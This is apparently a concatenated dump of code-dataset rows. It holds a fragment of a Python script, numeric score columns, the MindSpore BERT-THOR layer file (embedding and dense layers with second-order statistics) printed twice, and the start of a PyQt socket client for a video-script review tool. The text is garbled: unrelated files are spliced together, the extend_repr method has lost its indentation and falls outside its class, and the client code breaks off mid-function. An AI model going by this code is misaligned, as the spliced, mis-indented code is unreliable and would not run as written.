    end_time = time.time()
    print("done in " + "%.0f" % (end_time - start_time) + " seconds,",
          humanize.naturalsize(total_concat) + " concatenated")
if __name__ == "__main__":
main() | 0.335351 | 0.113432 |
"""thor_layer"""
import numpy as np
import mindspore.common.dtype as mstype
from mindspore._checkparam import check_bool, check_int_positive
from mindspore.common.initializer import TruncatedNormal, initializer
from mindspore.common.parameter import Parameter
from mindspore.common.tensor import Tensor
from mindspore.nn.cell import Cell
from mindspore.nn.layer.activation import get_activation
from mindspore.ops import operations as P
class Embedding_Thor(Cell):
    """
    An embeddings lookup table with a fixed dictionary and size, extended with
    THOR second-order optimizer statistics.

    Besides the plain embedding lookup, the layer maintains (as non-trainable
    Parameters) the inverses of the THOR curvature factors:
      * matrix_A_inv - input-side factor; for an embedding this is diagonal
        (one entry per vocabulary id), stored as a vector of length vocab_size.
      * matrix_G_inv - output-side factor over the embedding dimension,
        filled in during the backward pass by the save_gradient hook.

    Args:
        vocab_size (int): Size of the dictionary of embeddings.
        embedding_size (int): The size of each embedding vector.
        embedding_shape (list): [batch_size, seq_length, embedding_size], the shape of
            each embedding vector.
        use_one_hot_embeddings (bool): Specifies whether to use one hot encoding form. Default: False.
        initializer_range (float): Initialization value of TruncatedNormal. Default: 0.02.
        name (str): Name of the embedding-table Parameter. Default: 'embedding_table'.
        batch_size (int): Per-device batch size used to rescale gradients. Default: 12.
        damping: Damping schedule indexed by cov_step; it is gathered per step,
            so this is presumably a per-step tensor rather than a scalar -- TODO confirm.
        loss_scale (float): Loss-scaling factor; gradients are multiplied by
            1/loss_scale before statistics are computed. Default: 1.
        frequency (int): cov_step advances by this amount each time
            save_gradient runs. Default: 100.
    """

    def __init__(self,
                 vocab_size,
                 embedding_size,
                 embedding_shape,
                 use_one_hot_embeddings=False,
                 initializer_range=0.02,
                 name='embedding_table',
                 batch_size=12,
                 damping=0.03,
                 loss_scale=1,
                 frequency=100,
                 ):
        super(Embedding_Thor, self).__init__()
        self.vocab_size = vocab_size
        self.use_one_hot_embeddings = use_one_hot_embeddings
        # the trainable lookup table itself
        self.embedding_table = Parameter(initializer
                                         (TruncatedNormal(initializer_range),
                                          [vocab_size, embedding_size]),
                                         name=name)
        self.thor = True  # presumably toggled externally to enable/disable statistics -- confirm
        self.expand = P.ExpandDims()
        self.shape_flat = (-1,)
        self.gather = P.GatherV2()
        self.one_hot = P.OneHot()
        self.on_value = Tensor(1.0, mstype.float32)
        self.off_value = Tensor(0.0, mstype.float32)
        self.array_mul = P.MatMul()
        self.reshape = P.Reshape()
        self.em_shape = tuple(embedding_shape)
        self.shape = P.Shape()
        # gradients are un-scaled by 1/loss_scale before statistics are taken
        self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
        # THOR state: A factor is a vector over vocab ids, G factor is a dense
        # (embedding_size x embedding_size) matrix
        self.matrix_A_inv = Parameter(Tensor(np.zeros([vocab_size]).astype(np.float16)),
                                      name='matrix_A_inv', requires_grad=False)
        self.matrix_G_inv = Parameter(Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16)),
                                      name="matrix_G_inv", requires_grad=False)
        # placeholder assigned to matrix_G_inv on forward; the real value is
        # written by save_gradient during the backward pass
        self.fake_G = Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16))
        # damping terms added to the factors before inversion
        self.dampingA = Tensor(np.ones([vocab_size]).astype(np.float32))
        self.dampingG = Tensor(np.identity(embedding_size), mstype.float32)
        self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
        self.freq = Tensor(frequency, mstype.int32)
        self.axis = 0
        self.damping = damping
        self.gather = P.GatherV2()  # NOTE(review): duplicate of the assignment above; harmless
        self.sqrt = P.Sqrt()
        self.mul = P.Mul()
        self.cast = P.Cast()
        # custom (Ascend) cube ops used for the factor math
        self.cube_matmul = P.CusMatMulCube(transpose_a=True)
        self.vector_matmul = P.CusBatchMatMul()
        self.cholesky = P.CusCholeskyTrsm()
        self.matrix_combine = P.CusMatrixCombine()
        self.reduce_sum = P.ReduceSum(keep_dims=False)
        self.inv = P.Inv()
        # hook that runs save_gradient on the gradient flowing through construct's output
        self.getG = P.InsertGradientOf(self.save_gradient)
        self.batch_size = batch_size

    def save_gradient(self, dout):
        """Backward hook: refresh matrix_G_inv from the output gradient.

        Computes G from dout (presumably dout^T.dout / N -- CusMatMulCube is a
        custom op, confirm), adds sqrt(damping)*I, and stores a Cholesky-based
        inverse.  Returns dout unchanged so gradient flow is unaffected.
        """
        bs = self.batch_size
        bs = self.cast(bs, mstype.float32)
        out = dout
        # undo loss scaling and restore batch scale before taking statistics
        dout = self.mul(dout, self.loss_scale)
        dout = self.mul(dout, bs)
        shape = self.shape(dout)
        normalizer = self.cast(shape[0], mstype.float32)
        matrix_G = self.cube_matmul(dout, dout)
        matrix_G = self.mul(matrix_G, 1.0 / normalizer)
        # damping value for the current step (self.damping acts as a schedule)
        damping_step = self.gather(self.damping, self.cov_step, 0)
        damping_step = self.cast(damping_step, mstype.float32)
        self.cov_step = self.cov_step + self.freq
        damping = self.sqrt(damping_step)
        dampingG = self.cast(self.dampingG, mstype.float32)
        matrix_G = matrix_G + damping * dampingG
        # invert via Cholesky triangular solve, then recombine the blocks
        matrix_G_inv = self.cholesky(matrix_G)
        matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
        matrix_G_inv = self.matrix_combine(matrix_G_inv)
        matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
        self.matrix_G_inv = matrix_G_inv
        return out

    def construct(self, input_ids):
        """Look up embeddings for input_ids; in THOR mode also refresh the A factor.

        Returns (embeddings reshaped to em_shape, embedding_table).
        """
        flat_ids = self.reshape(input_ids, self.shape_flat)
        if self.use_one_hot_embeddings:
            one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
            output_for_reshape = self.array_mul(one_hot_ids, self.embedding_table)
        else:
            if self.thor:
                # for an embedding the A factor reduces to id frequencies:
                # column sums of the one-hot matrix, normalised by batch size
                one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
                matrix_A = self.reduce_sum(one_hot_ids, 0)
                normalizer = self.batch_size
                normalizer = self.cast(normalizer, mstype.float32)
                matrix_A = self.mul(matrix_A, 1.0 / normalizer)
                damping_step = self.gather(self.damping, self.cov_step, self.axis)
                damping_step = self.cast(damping_step, mstype.float32)
                damping = self.sqrt(damping_step)
                dampingA = self.cast(self.dampingA, mstype.float32)
                matrix_A = matrix_A + damping * dampingA
                # the factor is diagonal, so elementwise reciprocal inverts it
                matrix_A_inv = self.inv(matrix_A)
                matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
                self.matrix_A_inv = matrix_A_inv
                # reset G to the placeholder; save_gradient fills it on backward
                self.matrix_G_inv = self.fake_G
                output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
                output_for_reshape = self.getG(output_for_reshape)
            else:
                output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
        output = self.reshape(output_for_reshape, self.em_shape)
        return output, self.embedding_table
class Dense_Thor(Cell):
    """Fully-connected layer (y = x.W^T [+ b]) that additionally maintains THOR
    second-order statistics: matrix_A_inv is computed from the layer input in
    construct(), matrix_G_inv from the back-propagated gradient via the
    save_gradient hook."""

    def __init__(self,
                 in_channels,
                 out_channels,
                 weight_init='normal',
                 bias_init='zeros',
                 damping=0.03,
                 loss_scale=1,
                 frequency=100,
                 has_bias=False,
                 activation=None,
                 batch_size=12):
        super(Dense_Thor, self).__init__()
        self.in_channels = check_int_positive(in_channels)
        self.out_channels = check_int_positive(out_channels)
        self.has_bias = check_bool(has_bias)
        self.thor = True  # presumably toggled externally to enable/disable statistics -- confirm
        # validate a user-supplied weight tensor: must be (out_channels, in_channels)
        if isinstance(weight_init, Tensor):
            if weight_init.dim() != 2 or weight_init.shape()[0] != out_channels or \
                    weight_init.shape()[1] != in_channels:
                raise ValueError("weight_init shape error")
        self.weight = Parameter(initializer(weight_init, [out_channels, in_channels]), name="weight")
        if self.has_bias:
            if isinstance(bias_init, Tensor):
                if bias_init.dim() != 1 or bias_init.shape()[0] != out_channels:
                    raise ValueError("bias_init shape error")
            self.bias = Parameter(initializer(bias_init, [out_channels]), name="bias")
        self.matmul = P.MatMul(transpose_b=True)
        self.bias_add = P.BiasAdd()
        self.activation = get_activation(activation)
        self.activation_flag = self.activation is not None
        # THOR state: dense (in x in) and (out x out) factor inverses
        self.matrix_A_inv = Parameter(Tensor(np.zeros([in_channels, in_channels]).astype(np.float16)),
                                      name='matrix_A_inv', requires_grad=False)
        self.matrix_G_inv = Parameter(Tensor(np.zeros([out_channels, out_channels]).astype(np.float16)),
                                      name="matrix_G_inv", requires_grad=False)
        # placeholder assigned to matrix_G_inv on forward; save_gradient writes the real value
        self.fake_G = Tensor(np.zeros([out_channels, out_channels]).astype(np.float16))
        self.matmul = P.MatMul(transpose_b=True)  # NOTE(review): duplicate of the assignment above; harmless
        # custom (Ascend) cube ops used for the factor math
        self.cube_matmul = P.CusMatMulCube(transpose_a=True)
        self.matrix_combine = P.CusMatrixCombine()
        self.cholesky = P.CusCholeskyTrsm()
        self.shape = P.Shape()
        self.reshape = P.Reshape()
        self.transpose = P.Transpose()
        self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
        self.mul = P.Mul()
        self.cast = P.Cast()
        # damping acts as a per-step schedule gathered by cov_step (see save_gradient)
        self.damping = damping
        self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
        self.vector_matmul = P.CusBatchMatMul()
        self.gather = P.GatherV2()
        self.assignadd = P.AssignAdd()
        self.freq = Tensor(frequency, mstype.int32)
        self.axis = 0
        self.abs = P.Abs()
        self.reduce_max = P.ReduceMax(keep_dims=False)
        self.log = P.Log()
        self.exp = P.Exp()
        # identity damping terms added to the factors before inversion
        self.dampingA = Tensor(np.identity(in_channels), mstype.float32)
        self.dampingG = Tensor(np.identity(out_channels), mstype.float32)
        self.sqrt = P.Sqrt()
        # hook that runs save_gradient on the gradient flowing through construct's output
        self.getG = P.InsertGradientOf(self.save_gradient)
        self.batch_size = batch_size
    def save_gradient(self, dout):
        """Backward hook: refresh matrix_G_inv from the output gradient.

        Same scheme as Embedding_Thor.save_gradient: G is formed from dout
        (presumably dout^T.dout / N -- CusMatMulCube is a custom op, confirm),
        damped, and inverted via Cholesky.  Returns dout unchanged.
        """
        bs = self.cast(self.batch_size, mstype.float32)
        out = dout
        # undo loss scaling and restore batch scale before taking statistics
        dout = self.mul(dout, self.loss_scale)
        dout = self.mul(dout, bs)
        shape = self.shape(dout)
        normalizer = self.cast(shape[0], mstype.float32)
        matrix_G = self.cube_matmul(dout, dout)
        matrix_G = self.mul(matrix_G, 1.0 / normalizer)
        # damping value for the current step (self.damping acts as a schedule)
        damping_step = self.gather(self.damping, self.cov_step, 0)
        damping_step = self.cast(damping_step, mstype.float32)
        self.cov_step = self.cov_step + self.freq
        damping = self.sqrt(damping_step)
        dampingG = self.cast(self.dampingG, mstype.float32)
        matrix_G = matrix_G + damping * dampingG
        # invert via Cholesky triangular solve, then recombine the blocks
        matrix_G_inv = self.cholesky(matrix_G)
        matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
        matrix_G_inv = self.matrix_combine(matrix_G_inv)
        matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
        self.matrix_G_inv = matrix_G_inv
        return out
    def construct(self, x):
        """Forward pass; in THOR mode also refresh matrix_A_inv from the input.

        A is formed from x (presumably x^T.x / N -- CusMatMulCube is a custom
        op, confirm), damped, and inverted via Cholesky, mirroring
        save_gradient's handling of G.
        """
        if self.thor:
            inputs = self.cube_matmul(x, x)
            shape = self.shape(x)
            normalizer = self.cast(shape[0], mstype.float32)
            matrix_A = self.mul(inputs, 1.0 / normalizer)
            damping_step = self.gather(self.damping, self.cov_step, self.axis)
            damping_step = self.cast(damping_step, mstype.float32)
            damping = self.sqrt(damping_step)
            dampingA = self.cast(self.dampingA, mstype.float32)
            matrix_A = matrix_A + damping * dampingA
            matrix_A_inv = self.cholesky(matrix_A)
            matrix_A_inv = self.vector_matmul(matrix_A_inv, matrix_A_inv)
            matrix_A_inv = self.matrix_combine(matrix_A_inv)
            matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
            self.matrix_A_inv = matrix_A_inv
            # reset G to the placeholder; save_gradient fills it on backward
            self.matrix_G_inv = self.fake_G
            output = self.matmul(x, self.weight)
            output = self.getG(output)
        else:
            output = self.matmul(x, self.weight)
        if self.has_bias:
            output = self.bias_add(output, self.bias)
        if self.activation_flag:
            return self.activation(output)
        return output
def extend_repr(self):
"""extend_repr"""
str_info = 'in_channels={}, out_channels={}, weight={}, has_bias={}' \
.format(self.in_channels, self.out_channels, self.weight, self.has_bias)
if self.has_bias:
str_info = str_info + ', bias={}'.format(self.bias)
if self.activation_flag:
str_info = str_info + ', activation={}'.format(self.activation)
return str_info | model_zoo/official/nlp/bert_thor/src/thor_layer.py | """thor_layer"""
import numpy as np
import mindspore.common.dtype as mstype
from mindspore._checkparam import check_bool, check_int_positive
from mindspore.common.initializer import TruncatedNormal, initializer
from mindspore.common.parameter import Parameter
from mindspore.common.tensor import Tensor
from mindspore.nn.cell import Cell
from mindspore.nn.layer.activation import get_activation
from mindspore.ops import operations as P
class Embedding_Thor(Cell):
    """
    An embeddings lookup table with a fixed dictionary and size, extended with
    THOR second-order optimizer statistics.

    Besides the plain embedding lookup, the layer maintains (as non-trainable
    Parameters) the inverses of the THOR curvature factors:
      * matrix_A_inv - input-side factor; for an embedding this is diagonal
        (one entry per vocabulary id), stored as a vector of length vocab_size.
      * matrix_G_inv - output-side factor over the embedding dimension,
        filled in during the backward pass by the save_gradient hook.

    Args:
        vocab_size (int): Size of the dictionary of embeddings.
        embedding_size (int): The size of each embedding vector.
        embedding_shape (list): [batch_size, seq_length, embedding_size], the shape of
            each embedding vector.
        use_one_hot_embeddings (bool): Specifies whether to use one hot encoding form. Default: False.
        initializer_range (float): Initialization value of TruncatedNormal. Default: 0.02.
        name (str): Name of the embedding-table Parameter. Default: 'embedding_table'.
        batch_size (int): Per-device batch size used to rescale gradients. Default: 12.
        damping: Damping schedule indexed by cov_step; it is gathered per step,
            so this is presumably a per-step tensor rather than a scalar -- TODO confirm.
        loss_scale (float): Loss-scaling factor; gradients are multiplied by
            1/loss_scale before statistics are computed. Default: 1.
        frequency (int): cov_step advances by this amount each time
            save_gradient runs. Default: 100.
    """

    def __init__(self,
                 vocab_size,
                 embedding_size,
                 embedding_shape,
                 use_one_hot_embeddings=False,
                 initializer_range=0.02,
                 name='embedding_table',
                 batch_size=12,
                 damping=0.03,
                 loss_scale=1,
                 frequency=100,
                 ):
        super(Embedding_Thor, self).__init__()
        self.vocab_size = vocab_size
        self.use_one_hot_embeddings = use_one_hot_embeddings
        # the trainable lookup table itself
        self.embedding_table = Parameter(initializer
                                         (TruncatedNormal(initializer_range),
                                          [vocab_size, embedding_size]),
                                         name=name)
        self.thor = True  # presumably toggled externally to enable/disable statistics -- confirm
        self.expand = P.ExpandDims()
        self.shape_flat = (-1,)
        self.gather = P.GatherV2()
        self.one_hot = P.OneHot()
        self.on_value = Tensor(1.0, mstype.float32)
        self.off_value = Tensor(0.0, mstype.float32)
        self.array_mul = P.MatMul()
        self.reshape = P.Reshape()
        self.em_shape = tuple(embedding_shape)
        self.shape = P.Shape()
        # gradients are un-scaled by 1/loss_scale before statistics are taken
        self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
        # THOR state: A factor is a vector over vocab ids, G factor is a dense
        # (embedding_size x embedding_size) matrix
        self.matrix_A_inv = Parameter(Tensor(np.zeros([vocab_size]).astype(np.float16)),
                                      name='matrix_A_inv', requires_grad=False)
        self.matrix_G_inv = Parameter(Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16)),
                                      name="matrix_G_inv", requires_grad=False)
        # placeholder assigned to matrix_G_inv on forward; the real value is
        # written by save_gradient during the backward pass
        self.fake_G = Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16))
        # damping terms added to the factors before inversion
        self.dampingA = Tensor(np.ones([vocab_size]).astype(np.float32))
        self.dampingG = Tensor(np.identity(embedding_size), mstype.float32)
        self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
        self.freq = Tensor(frequency, mstype.int32)
        self.axis = 0
        self.damping = damping
        self.gather = P.GatherV2()  # NOTE(review): duplicate of the assignment above; harmless
        self.sqrt = P.Sqrt()
        self.mul = P.Mul()
        self.cast = P.Cast()
        # custom (Ascend) cube ops used for the factor math
        self.cube_matmul = P.CusMatMulCube(transpose_a=True)
        self.vector_matmul = P.CusBatchMatMul()
        self.cholesky = P.CusCholeskyTrsm()
        self.matrix_combine = P.CusMatrixCombine()
        self.reduce_sum = P.ReduceSum(keep_dims=False)
        self.inv = P.Inv()
        # hook that runs save_gradient on the gradient flowing through construct's output
        self.getG = P.InsertGradientOf(self.save_gradient)
        self.batch_size = batch_size

    def save_gradient(self, dout):
        """Backward hook: refresh matrix_G_inv from the output gradient.

        Computes G from dout (presumably dout^T.dout / N -- CusMatMulCube is a
        custom op, confirm), adds sqrt(damping)*I, and stores a Cholesky-based
        inverse.  Returns dout unchanged so gradient flow is unaffected.
        """
        bs = self.batch_size
        bs = self.cast(bs, mstype.float32)
        out = dout
        # undo loss scaling and restore batch scale before taking statistics
        dout = self.mul(dout, self.loss_scale)
        dout = self.mul(dout, bs)
        shape = self.shape(dout)
        normalizer = self.cast(shape[0], mstype.float32)
        matrix_G = self.cube_matmul(dout, dout)
        matrix_G = self.mul(matrix_G, 1.0 / normalizer)
        # damping value for the current step (self.damping acts as a schedule)
        damping_step = self.gather(self.damping, self.cov_step, 0)
        damping_step = self.cast(damping_step, mstype.float32)
        self.cov_step = self.cov_step + self.freq
        damping = self.sqrt(damping_step)
        dampingG = self.cast(self.dampingG, mstype.float32)
        matrix_G = matrix_G + damping * dampingG
        # invert via Cholesky triangular solve, then recombine the blocks
        matrix_G_inv = self.cholesky(matrix_G)
        matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
        matrix_G_inv = self.matrix_combine(matrix_G_inv)
        matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
        self.matrix_G_inv = matrix_G_inv
        return out

    def construct(self, input_ids):
        """Look up embeddings for input_ids; in THOR mode also refresh the A factor.

        Returns (embeddings reshaped to em_shape, embedding_table).
        """
        flat_ids = self.reshape(input_ids, self.shape_flat)
        if self.use_one_hot_embeddings:
            one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
            output_for_reshape = self.array_mul(one_hot_ids, self.embedding_table)
        else:
            if self.thor:
                # for an embedding the A factor reduces to id frequencies:
                # column sums of the one-hot matrix, normalised by batch size
                one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
                matrix_A = self.reduce_sum(one_hot_ids, 0)
                normalizer = self.batch_size
                normalizer = self.cast(normalizer, mstype.float32)
                matrix_A = self.mul(matrix_A, 1.0 / normalizer)
                damping_step = self.gather(self.damping, self.cov_step, self.axis)
                damping_step = self.cast(damping_step, mstype.float32)
                damping = self.sqrt(damping_step)
                dampingA = self.cast(self.dampingA, mstype.float32)
                matrix_A = matrix_A + damping * dampingA
                # the factor is diagonal, so elementwise reciprocal inverts it
                matrix_A_inv = self.inv(matrix_A)
                matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
                self.matrix_A_inv = matrix_A_inv
                # reset G to the placeholder; save_gradient fills it on backward
                self.matrix_G_inv = self.fake_G
                output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
                output_for_reshape = self.getG(output_for_reshape)
            else:
                output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
        output = self.reshape(output_for_reshape, self.em_shape)
        return output, self.embedding_table
class Dense_Thor(Cell):
    """Fully-connected layer (y = x.W^T [+ b]) that additionally maintains THOR
    second-order statistics: matrix_A_inv is computed from the layer input in
    construct(), matrix_G_inv from the back-propagated gradient via the
    save_gradient hook."""

    def __init__(self,
                 in_channels,
                 out_channels,
                 weight_init='normal',
                 bias_init='zeros',
                 damping=0.03,
                 loss_scale=1,
                 frequency=100,
                 has_bias=False,
                 activation=None,
                 batch_size=12):
        super(Dense_Thor, self).__init__()
        self.in_channels = check_int_positive(in_channels)
        self.out_channels = check_int_positive(out_channels)
        self.has_bias = check_bool(has_bias)
        self.thor = True  # presumably toggled externally to enable/disable statistics -- confirm
        # validate a user-supplied weight tensor: must be (out_channels, in_channels)
        if isinstance(weight_init, Tensor):
            if weight_init.dim() != 2 or weight_init.shape()[0] != out_channels or \
                    weight_init.shape()[1] != in_channels:
                raise ValueError("weight_init shape error")
        self.weight = Parameter(initializer(weight_init, [out_channels, in_channels]), name="weight")
        if self.has_bias:
            if isinstance(bias_init, Tensor):
                if bias_init.dim() != 1 or bias_init.shape()[0] != out_channels:
                    raise ValueError("bias_init shape error")
            self.bias = Parameter(initializer(bias_init, [out_channels]), name="bias")
        self.matmul = P.MatMul(transpose_b=True)
        self.bias_add = P.BiasAdd()
        self.activation = get_activation(activation)
        self.activation_flag = self.activation is not None
        # THOR state: dense (in x in) and (out x out) factor inverses
        self.matrix_A_inv = Parameter(Tensor(np.zeros([in_channels, in_channels]).astype(np.float16)),
                                      name='matrix_A_inv', requires_grad=False)
        self.matrix_G_inv = Parameter(Tensor(np.zeros([out_channels, out_channels]).astype(np.float16)),
                                      name="matrix_G_inv", requires_grad=False)
        # placeholder assigned to matrix_G_inv on forward; save_gradient writes the real value
        self.fake_G = Tensor(np.zeros([out_channels, out_channels]).astype(np.float16))
        self.matmul = P.MatMul(transpose_b=True)  # NOTE(review): duplicate of the assignment above; harmless
        # custom (Ascend) cube ops used for the factor math
        self.cube_matmul = P.CusMatMulCube(transpose_a=True)
        self.matrix_combine = P.CusMatrixCombine()
        self.cholesky = P.CusCholeskyTrsm()
        self.shape = P.Shape()
        self.reshape = P.Reshape()
        self.transpose = P.Transpose()
        self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
        self.mul = P.Mul()
        self.cast = P.Cast()
        # damping acts as a per-step schedule gathered by cov_step (see save_gradient)
        self.damping = damping
        self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
        self.vector_matmul = P.CusBatchMatMul()
        self.gather = P.GatherV2()
        self.assignadd = P.AssignAdd()
        self.freq = Tensor(frequency, mstype.int32)
        self.axis = 0
        self.abs = P.Abs()
        self.reduce_max = P.ReduceMax(keep_dims=False)
        self.log = P.Log()
        self.exp = P.Exp()
        # identity damping terms added to the factors before inversion
        self.dampingA = Tensor(np.identity(in_channels), mstype.float32)
        self.dampingG = Tensor(np.identity(out_channels), mstype.float32)
        self.sqrt = P.Sqrt()
        # hook that runs save_gradient on the gradient flowing through construct's output
        self.getG = P.InsertGradientOf(self.save_gradient)
        self.batch_size = batch_size
    def save_gradient(self, dout):
        """Backward hook: refresh matrix_G_inv from the output gradient.

        Same scheme as Embedding_Thor.save_gradient: G is formed from dout
        (presumably dout^T.dout / N -- CusMatMulCube is a custom op, confirm),
        damped, and inverted via Cholesky.  Returns dout unchanged.
        """
        bs = self.cast(self.batch_size, mstype.float32)
        out = dout
        # undo loss scaling and restore batch scale before taking statistics
        dout = self.mul(dout, self.loss_scale)
        dout = self.mul(dout, bs)
        shape = self.shape(dout)
        normalizer = self.cast(shape[0], mstype.float32)
        matrix_G = self.cube_matmul(dout, dout)
        matrix_G = self.mul(matrix_G, 1.0 / normalizer)
        # damping value for the current step (self.damping acts as a schedule)
        damping_step = self.gather(self.damping, self.cov_step, 0)
        damping_step = self.cast(damping_step, mstype.float32)
        self.cov_step = self.cov_step + self.freq
        damping = self.sqrt(damping_step)
        dampingG = self.cast(self.dampingG, mstype.float32)
        matrix_G = matrix_G + damping * dampingG
        # invert via Cholesky triangular solve, then recombine the blocks
        matrix_G_inv = self.cholesky(matrix_G)
        matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
        matrix_G_inv = self.matrix_combine(matrix_G_inv)
        matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
        self.matrix_G_inv = matrix_G_inv
        return out
    def construct(self, x):
        """Forward pass; in THOR mode also refresh matrix_A_inv from the input.

        A is formed from x (presumably x^T.x / N -- CusMatMulCube is a custom
        op, confirm), damped, and inverted via Cholesky, mirroring
        save_gradient's handling of G.
        """
        if self.thor:
            inputs = self.cube_matmul(x, x)
            shape = self.shape(x)
            normalizer = self.cast(shape[0], mstype.float32)
            matrix_A = self.mul(inputs, 1.0 / normalizer)
            damping_step = self.gather(self.damping, self.cov_step, self.axis)
            damping_step = self.cast(damping_step, mstype.float32)
            damping = self.sqrt(damping_step)
            dampingA = self.cast(self.dampingA, mstype.float32)
            matrix_A = matrix_A + damping * dampingA
            matrix_A_inv = self.cholesky(matrix_A)
            matrix_A_inv = self.vector_matmul(matrix_A_inv, matrix_A_inv)
            matrix_A_inv = self.matrix_combine(matrix_A_inv)
            matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
            self.matrix_A_inv = matrix_A_inv
            # reset G to the placeholder; save_gradient fills it on backward
            self.matrix_G_inv = self.fake_G
            output = self.matmul(x, self.weight)
            output = self.getG(output)
        else:
            output = self.matmul(x, self.weight)
        if self.has_bias:
            output = self.bias_add(output, self.bias)
        if self.activation_flag:
            return self.activation(output)
        return output
def extend_repr(self):
"""extend_repr"""
str_info = 'in_channels={}, out_channels={}, weight={}, has_bias={}' \
.format(self.in_channels, self.out_channels, self.weight, self.has_bias)
if self.has_bias:
str_info = str_info + ', bias={}'.format(self.bias)
if self.activation_flag:
str_info = str_info + ', activation={}'.format(self.activation)
return str_info | 0.893522 | 0.584597 |
import socket
from time import sleep
import sys
import pickle
from threading import Thread
from manualreview import rawscriptsmenu
import hashlib
from manualreview import videoscriptcore
import datetime
from manualreview import publishmenu
from manualreview import settings
from PyQt5 import QtWidgets
import configparser
from PyQt5.QtCore import *
from PyQt5 import QtGui
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import uic
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (settings.server_address, int(settings.server_port))

# Session state shared between the UI and the network threads.
access_key = None            # auth token; presumably set by the response listener after login -- confirm
loginwindowinstance = None   # LoginWindow that initiated the current login attempt
login_sucess = None          # NOTE(review): typo for "login_success"; keep name -- other modules may read it
logged_in_as = None          # username of the logged-in reviewer
sendingToServer = False      # transfer-in-flight flags; clientTick() skips pings while either is True
recievingFromServer = False  # NOTE(review): typo for "receiving..."; keep name for the same reason
lastPing = None              # datetime of the last keep-alive ping sent by clientTick()
class LoginWindow(QMainWindow):
    """Qt login dialog: connects to the server on creation and, on a successful
    login, opens the raw-scripts menu and starts downloading scripts."""

    # emitted (by the network code) once the server has answered a login attempt
    login_response = pyqtSignal()

    def __init__(self):
        # NOTE(review): initialised via QWidget.__init__ although the base class
        # is QMainWindow -- confirm this is intentional
        QWidget.__init__(self)
        uic.loadUi("UI/login.ui", self)
        connectToServer()
        self.login.clicked.connect(self.attemptLogin)
        self.login_response.connect(self.loginResponse)
        # auto-login when credentials are pre-configured in settings
        if not settings.auto_login_user == "":
            login(settings.auto_login_user, settings.auto_login_password, self)
        # NOTE(review): the original carried a stray comment that looked like
        # hard-coded credentials ("admin icecream") -- verify and remove upstream

    def attemptLogin(self):
        """Send the username/password typed into the form to the server."""
        username = self.username.text()
        password = self.password.text()
        login(username, password, self)

    def loginResponse(self):
        """Slot run after the server replies: open the main menu on success."""
        if login_sucess:
            self.status.setText("Status: Login Success")
            self.close()
            self.rawscriptsmenu = rawscriptsmenu.ScriptsMenu(logged_in_as)
            self.rawscriptsmenu.show()
            downloadScripts(settings.amount_scripts_download)
        else:
            self.status.setText("Status: Login Fail")
def formatVideoScript(script):
    """Package a finished VideoScript and send it to the server as an
    "upload-video" request."""
    # everything the server needs to render and publish the video
    video_details = (
        script.final_script,
        script.videoType,
        script.videosettings,
        script.music_type,
        script.thumbnail,
        script.charactersAmount,
        script.youtube_title,
        script.youtube_description,
        script.youtube_tags,
    )
    sendToServer(sock, (access_key, "upload-video", script.scriptno, video_details))
def connectToServer():
    """Connect the module-level socket to the configured server and start the
    response-listener and keep-alive threads.  Exits the process when the
    server is unreachable."""
    print('connecting to %s port %s' % server_address)
    try:
        sock.connect(server_address)
        sock.settimeout(None)  # blocking socket: waits indefinitely on recv
    except ConnectionRefusedError:
        input("Could not connect to server. Press enter to continue")
        exit()
    # background thread handling everything the server sends back
    thread = Thread(target=serverResponseListen)
    thread.start()
    # background thread pinging the server roughly once a minute
    thread = Thread(target=clientTick)
    thread.start()
def clientTick():
    """Keep-alive loop: ping the server about once per wall-clock minute while
    no transfer is in flight.  Runs forever on its own thread."""
    global lastPing, recievingFromServer
    while True:
        sleep(1)
        # only ping while the connection is otherwise idle
        if not sendingToServer and not recievingFromServer:
            if lastPing is None:
                # first ping of the session
                sendToServer(sock, (access_key, "PING",))
                lastPing = datetime.datetime.now()
                print("%s CLIENT sending ping" % (datetime.datetime.now()))
            else:
                now = datetime.datetime.now()
                # ping whenever the minute has rolled over since the last one
                if not lastPing.minute == now.minute:
                    sendToServer(sock, (access_key, "PING",))
                    print("%s CLIENT sending ping (%s)" % (datetime.datetime.now(), now - lastPing))
                    lastPing = now
def login(username, password, loginwindowinstancearg = None):
    """Send a login attempt to the server and remember which window asked.

    The server's reply is handled asynchronously (the response listener
    presumably triggers LoginWindow.login_response -- confirm).
    """
    global loginwindowinstance, logged_in_as
    loginwindowinstance = loginwindowinstancearg
